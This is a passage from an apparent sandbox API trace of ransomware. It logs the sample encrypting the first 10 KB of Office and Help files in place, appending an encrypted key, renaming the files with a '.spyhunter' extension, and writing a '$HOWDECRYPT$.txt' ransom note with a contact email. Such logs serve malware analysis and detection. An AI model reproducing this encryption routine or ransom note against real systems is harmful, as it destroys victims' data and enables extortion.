[0178.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0178.470] GetProcessHeap () returned 0x2c0000 [0178.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4c258 | out: hHeap=0x2c0000) returned 1 [0178.470] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce338 | out: pbBuffer=0x25ce338) returned 1 [0178.470] GetProcessHeap () returned 0x2c0000 [0178.470] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0178.470] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce330*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce330*=0x30) returned 1 [0178.470] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSORES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msores.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x9c [0178.472] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSORES.DLL") returned 76 [0178.472] StrStrW (lpFirst="MSORES.DLL", lpSrch=".txt") returned 0x0 [0178.472] GetProcessHeap () returned 0x2c0000 [0178.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0178.472] ReadFile (in: hFile=0x9c, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce2f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x25ce2f4*=0x2800, lpOverlapped=0x0) returned 1 [0178.545] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.545] WriteFile (in: hFile=0x9c, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce2f4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x25ce2f4*=0x2800, lpOverlapped=0x0) returned 1 [0178.545] GetProcessHeap () returned 0x2c0000 [0178.545] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0178.545] SetFilePointerEx (in: hFile=0x9c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.545] WriteFile (in: hFile=0x9c, lpBuffer=0x25ce334*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce2f4, lpOverlapped=0x0 | out: lpBuffer=0x25ce334*, lpNumberOfBytesWritten=0x25ce2f4*=0x4, lpOverlapped=0x0) returned 1 [0178.584] WriteFile (in: hFile=0x9c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce2f4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce2f4*=0x30, lpOverlapped=0x0) returned 1 [0178.584] CloseHandle (hObject=0x9c) returned 1 [0178.664] GetProcessHeap () returned 0x2c0000 [0178.671] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.672] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSORES.DLL.spyhunter") returned 86 [0178.672] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSORES.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msores.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\MSORES.DLL.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\msores.dll.spyhunter")) returned 1 [0178.674] GetProcessHeap () returned 0x2c0000 [0178.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.674] GetProcessHeap () returned 0x2c0000 [0178.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0178.674] GetProcessHeap () returned 0x2c0000 [0178.674] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee8ce0 | out: hHeap=0x2c0000) returned 1 [0178.674] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce330 | out: pbBuffer=0x25ce330) returned 1 [0178.674] GetProcessHeap () returned 0x2c0000 [0178.674] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0178.675] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce328*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce328*=0x30) returned 1 [0178.675] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\csisoap.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.678] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\CsiSoap.dll") returned 77 [0178.679] StrStrW (lpFirst="CsiSoap.dll", lpSrch=".txt") returned 0x0 [0178.679] GetProcessHeap () returned 0x2c0000 [0178.679] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0178.679] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce2ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce2ec*=0x2800, lpOverlapped=0x0) returned 1 [0178.858] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.858] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce2ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce2ec*=0x2800, lpOverlapped=0x0) returned 1 [0178.858] GetProcessHeap () returned 0x2c0000 [0178.858] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0178.858] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.858] WriteFile (in: hFile=0x178, lpBuffer=0x25ce32c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce2ec, lpOverlapped=0x0 | out: lpBuffer=0x25ce32c*, lpNumberOfBytesWritten=0x25ce2ec*=0x4, lpOverlapped=0x0) returned 1 [0178.860] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce2ec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce2ec*=0x30, lpOverlapped=0x0) returned 1 [0178.860] CloseHandle (hObject=0x178) returned 1 [0178.860] GetProcessHeap () returned 0x2c0000 [0178.860] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.860] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\CsiSoap.dll.spyhunter") returned 87 [0178.860] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\CsiSoap.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\csisoap.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\CsiSoap.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\csisoap.dll.spyhunter")) returned 1 [0178.862] GetProcessHeap () returned 0x2c0000 [0178.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.862] GetProcessHeap () returned 0x2c0000 [0178.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0178.862] GetProcessHeap () returned 0x2c0000 [0178.862] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee8bf8 | out: hHeap=0x2c0000) returned 1 [0178.862] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce330 | out: pbBuffer=0x25ce330) returned 1 [0178.862] GetProcessHeap () returned 0x2c0000 [0178.862] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0178.862] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce328*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce328*=0x30) returned 1 [0178.862] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0178.863] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL") returned 82 [0178.863] StrStrW (lpFirst="MSOINTL.DLL", lpSrch=".txt") returned 0x0 [0178.863] GetProcessHeap () returned 0x2c0000 [0178.863] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0178.863] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce2ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce2ec*=0x2800, lpOverlapped=0x0) returned 1 [0178.941] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.941] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce2ec, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce2ec*=0x2800, lpOverlapped=0x0) returned 1 [0178.942] GetProcessHeap () returned 0x2c0000 [0178.942] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0178.942] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.942] WriteFile (in: hFile=0x178, lpBuffer=0x25ce32c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce2ec, lpOverlapped=0x0 | out: lpBuffer=0x25ce32c*, lpNumberOfBytesWritten=0x25ce2ec*=0x4, lpOverlapped=0x0) returned 1 [0178.943] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce2ec, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce2ec*=0x30, lpOverlapped=0x0) returned 1 [0178.943] CloseHandle (hObject=0x178) returned 1 [0178.943] GetProcessHeap () returned 0x2c0000 [0178.943] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.943] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.spyhunter") returned 92 [0178.943] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\OFFICE14\\1033\\MSOINTL.DLL.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\office14\\1033\\msointl.dll.spyhunter")) returned 1 [0178.944] GetProcessHeap () returned 0x2c0000 [0178.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.944] GetProcessHeap () returned 0x2c0000 [0178.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0178.944] GetProcessHeap () returned 0x2c0000 [0178.944] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e80a80 | out: hHeap=0x2c0000) returned 1 [0178.944] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce328 | out: pbBuffer=0x25ce328) returned 1 [0178.944] GetProcessHeap () returned 0x2c0000 [0178.944] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0178.944] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce320*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce320*=0x30) returned 1 [0178.945] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\rtscom.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\rtscom.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.945] GetProcessHeap () returned 0x2c0000 [0178.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0178.945] GetProcessHeap () returned 0x2c0000 [0178.945] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e804e0 | out: hHeap=0x2c0000) returned 1 [0178.946] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce328 | out: pbBuffer=0x25ce328) returned 1 [0178.946] GetProcessHeap () returned 0x2c0000 [0178.946] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0178.946] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce320*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce320*=0x30) returned 1 [0178.946] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\ink\\en-US\\mshwLatin.dll.mui" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\ink\\en-us\\mshwlatin.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0178.964] GetProcessHeap () returned 0x2c0000 [0178.964] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0178.965] GetProcessHeap () returned 0x2c0000 [0178.965] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e4b1e0 | out: hHeap=0x2c0000) returned 1 [0178.965] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce320 | out: pbBuffer=0x25ce320) returned 1 [0178.965] GetProcessHeap () returned 0x2c0000 [0178.965] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0178.965] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce318*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce318*=0x30) returned 1 [0178.965] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxT" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hx.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.971] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxT") returned 68 [0178.971] StrStrW (lpFirst="Hx.HxT", lpSrch=".txt") returned 0x0 [0178.971] GetProcessHeap () returned 0x2c0000 [0178.971] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0178.971] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce2dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce2dc*=0xa9, lpOverlapped=0x0) returned 1 [0178.972] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffff57, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0178.972] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0xa9, lpNumberOfBytesWritten=0x25ce2dc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce2dc*=0xa9, lpOverlapped=0x0) returned 1 [0178.972] GetProcessHeap () returned 0x2c0000 [0178.972] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0178.972] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0178.972] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce31c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce2dc, lpOverlapped=0x0 | out: lpBuffer=0x25ce31c*, lpNumberOfBytesWritten=0x25ce2dc*=0x4, lpOverlapped=0x0) returned 1 [0178.972] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce2dc, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce2dc*=0x30, lpOverlapped=0x0) returned 1 [0178.972] CloseHandle (hObject=0xb0) returned 1 [0178.972] GetProcessHeap () returned 0x2c0000 [0178.972] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0178.972] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxT.spyhunter") returned 78 [0178.973] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxT" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hx.hxt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\Hx.HxT.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\hx.hxt.spyhunter")) returned 1 [0178.973] GetProcessHeap () returned 0x2c0000 [0178.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0178.973] GetProcessHeap () returned 0x2c0000 [0178.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0178.973] GetProcessHeap () returned 0x2c0000 [0178.973] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7b6e8 | out: hHeap=0x2c0000) returned 1 [0178.973] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\3082\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.974] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0178.974] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce253*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x25ce37c, lpOverlapped=0x0 | out: lpBuffer=0x25ce253*, lpNumberOfBytesWritten=0x25ce37c*=0x127, lpOverlapped=0x0) returned 1 [0178.975] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0178.975] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x25ce37c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x25ce37c*=0x2ac, lpOverlapped=0x0) returned 1 [0178.975] CloseHandle (hObject=0xb0) returned 1 [0178.975] GetProcessHeap () returned 0x2c0000 [0178.975] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e7fe50 | out: hHeap=0x2c0000) returned 1 [0178.975] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x25ce318 | out: pbBuffer=0x25ce318) returned 1 [0178.975] GetProcessHeap () returned 0x2c0000 [0178.975] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0178.975] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x25ce310*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x25ce310*=0x30) returned 1 [0178.975] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\3082\\hxdsui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0178.976] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll") returned 77 [0178.976] StrStrW (lpFirst="hxdsui.dll", lpSrch=".txt") returned 0x0 [0178.976] GetProcessHeap () returned 0x2c0000 [0178.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0178.976] ReadFile (in: hFile=0xb0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x25ce2d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x25ce2d4*=0x2800, lpOverlapped=0x0) returned 1 [0179.139] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0179.140] WriteFile (in: hFile=0xb0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x25ce2d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x25ce2d4*=0x2800, lpOverlapped=0x0) returned 1 [0179.140] GetProcessHeap () returned 0x2c0000 [0179.140] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0179.140] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.140] WriteFile (in: hFile=0xb0, lpBuffer=0x25ce314*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x25ce2d4, lpOverlapped=0x0 | out: lpBuffer=0x25ce314*, lpNumberOfBytesWritten=0x25ce2d4*=0x4, lpOverlapped=0x0) returned 1 [0179.234] WriteFile (in: hFile=0xb0, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x25ce2d4, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x25ce2d4*=0x30, lpOverlapped=0x0) returned 1 [0179.235] CloseHandle (hObject=0xb0) returned 1 [0179.235] GetProcessHeap () returned 0x2c0000 [0179.235] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0179.235] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll.spyhunter") returned 87 [0179.235] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\3082\\hxdsui.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\3082\\hxdsui.dll.spyhunter" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\3082\\hxdsui.dll.spyhunter")) returned 1 [0179.235] GetProcessHeap () returned 0x2c0000 [0179.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0179.236] GetProcessHeap () returned 0x2c0000 [0179.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0179.236] GetProcessHeap () returned 0x2c0000 [0179.236] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ee85a0 | out: hHeap=0x2c0000) returned 1 [0179.236] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\microsoft shared\\Help\\1040\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\common files\\microsoft shared\\help\\1040\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, 